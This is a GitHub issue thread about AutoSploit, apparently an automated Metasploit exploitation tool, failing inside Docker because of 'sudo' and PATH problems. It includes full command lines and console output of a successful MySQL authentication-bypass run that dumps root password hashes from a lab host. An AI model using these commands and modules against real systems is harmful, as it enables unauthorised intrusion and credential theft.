AutoSploit not executing msf commands in docker

[scmanjarrez]

Running information

• What branch did you download? Master
• Clone, or docker run? Docker
• What OS are you running? Kali GNU/linux rolling in host, Ubuntu 18.04.3 in docker

Exploit module information

• What exploit was deployed? auxiliary-scanner-mysql-mysql_authbypass_hashdump
• Was a session generated for the target? No
• What version of metasploit are you running? Framework Version: 4.17.94-dev-0394a7b0d1 (the docker version)

Program information

• Python version number? 2.7.15 (docker)
• AutoSploit version number? Master
• Any console output that is relevant to the issue: No output
• Traceback (error) if any:

root@008fc2721648:/opt/metasploit-framework/AutoSploit# python autosploit.py -e -C msf_autorun 10.10.20.3 2424 -f exploits.json

                  . '  .
               ' .( '.) '
       _     ('-.)' (`'.) '
      |0|- -(  #autosploit  )
   .--`+'--.  .  (' -,).(') .
   |`-----'|   (' .) - ('. )
   |       |    . (' `.  )
   |  .-.  |       ` .  `
   | (0.0) |
   | >|=|< |
   |  `"`  |
   |       |
   |       |
   `-.___.-'
   v(4.0)
    
[+] welcome to autosploit, give us a little bit while we configure
[i] checking your running platform
[i] checking for disabled services
[+] attempting to load API keys
[+] Shodan API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/shodan.key
[+] Censys API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/censys.key
[i] Loaded 1 exploits from exploits.json.
[+] Launching exploits against 1 hosts:
[+] launching exploit 'auxiliary/scanner/mysql/mysql_authbypass_hashdump' against host '10.10.0.3'
[+] Executing command 'sudo msfconsole -r /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump -q'

[+] **********RESULTS**********
[+] 	1 exploits run against 1 hosts.
[+] 	0 exploit successful (Check report.csv to validate!).
[+] 	0 exploit failed.
[+] 	Exploit run saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s
[+] 	Report saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s/report.csv

I have run AutoSploit in docker and it isn't working correctly. You can see that exploiter.py is executing the command "sudo msfconsole ...". In the docker machine there is no "sudo", so it fails the execution, then, "msfconsole" is not in PATH so it won't work either.
After removal of "sudo"

sed -i 's/sudo //g' lib/exploitation/exploiter.py

and addition of msfconsole to path (or using --msf-path), it works flawlessly

export PATH=$PATH:/opt/metasploit-framework

root@008fc2721648:/opt/metasploit-framework/AutoSploit# python autosploit.py -e -C msf_autorun 10.10.20.3 2424 -f exploits.json

                  . '  .
               ' .( '.) '
       _     ('-.)' (`'.) '
      |0|- -(  #autosploit  )
   .--`+'--.  .  (' -,).(') .
   |`-----'|   (' .) - ('. )
   |       |    . (' `.  )
   |  .-.  |       ` .  `
   | (0.0) |
   | >|=|< |
   |  `"`  |
   |       |
   |       |
   `-.___.-'
   v(4.0)
    
[+] welcome to autosploit, give us a little bit while we configure
[i] checking your running platform
[i] checking for disabled services
[+] attempting to load API keys
[+] Shodan API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/shodan.key
[+] Censys API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/censys.key
[i] Loaded 1 exploits from exploits.json.
[+] Launching exploits against 1 hosts:
[+] launching exploit 'auxiliary/scanner/mysql/mysql_authbypass_hashdump' against host '10.10.0.3'
[+] Executing command 'msfconsole -r /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump -q'
(msf)>> [*] Processing /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump for ERB directives.
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> workspace -a msf_autorun
(msf)>> [*] Added workspace: msf_autorun
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg lhost 10.10.20.3
(msf)>> lhost => 10.10.20.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg lport 2424
(msf)>> lport => 2424
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg verbose true
(msf)>> verbose => true
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg threads 20
(msf)>> threads => 20
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> set rhost 10.10.0.3
(msf)>> [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
(msf)>> rhost => 10.10.0.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> set rhosts 10.10.0.3
(msf)>> rhosts => 10.10.0.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> run -z
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 The server allows logins, proceeding with bypass test
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 10% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 20% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 30% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 40% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 50% complete
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Successfully bypassed authentication after 588 attempts. URI: mysql://root:[email protected]:3306
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Hash Table has been saved: /root/.msf4/loot/20191126161722_msf_autorun_10.10.0.3_mysql.hashes_300774.txt
(msf)>> [*] Scanned 1 of 1 hosts (100% complete)
(msf)>> [*] Auxiliary module execution completed
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> exit -y
(msf)>> 

[+] **********RESULTS**********
[+] 	1 exploits run against 1 hosts.
[+] 	1 exploit successful (Check report.csv to validate!).
[+] 	0 exploit failed.
[+] 	Exploit run saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s
[+] 	Report saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/report.csv

Meanwhile, I'm adding these workarounds to my entrypoint.sh.

[Ekultek]

Are you saying that you have msf inside of a docker container and want to execute the commands in the container, or that the docker image with AS is bad?

[Ekultek]

@NullArray we could just add a --docker flag and if it's passed don't use the sudo keyword when executing the command. We could also check if the user is inside a docker container before executing just in case and if we determine they are we can either disallow them execution or automatically associate the flag as True. What do you think?

[scmanjarrez]

Are you saying that you have msf inside of a docker container and want to execute the commands in the container, or that the docker image with AS is bad?

Correct, I'm trying to execute AutoSploit from a container without user input, using -e and -f arguments.

[Ekultek]

@scmanjarrez what do you think of the docker flag idea above? Or do you think it would work better to detect if the user is inside a docker container and go from there?

[scmanjarrez]

@scmanjarrez what do you think of the docker flag idea above? Or do you think it would work better to detect if the user is inside a docker container and go from there?

it's ok for me to use the --docker flag, right now I'm detecting if autosploit is running inside a docker container, but it would be better to make it general so it'll work regardless the container tool.

[Ekultek]

it's ok for me to use the --docker flag, right now I'm detecting if autosploit is running inside a docker container, but it would be better to make it general so it'll work regardless the container tool.

Alright I’ll create a way to determine if we’re inside a rocker container, that should make it more portable instead of creating a flag that will have to be passed.

Basically what I’ll do is just check if we’re inside a container, if we are, I’ll get it to run without sudo. It’ll be up to you to pass the path though (if needed)

[Ekultek]

fixed via 03020fd look for it in the next merge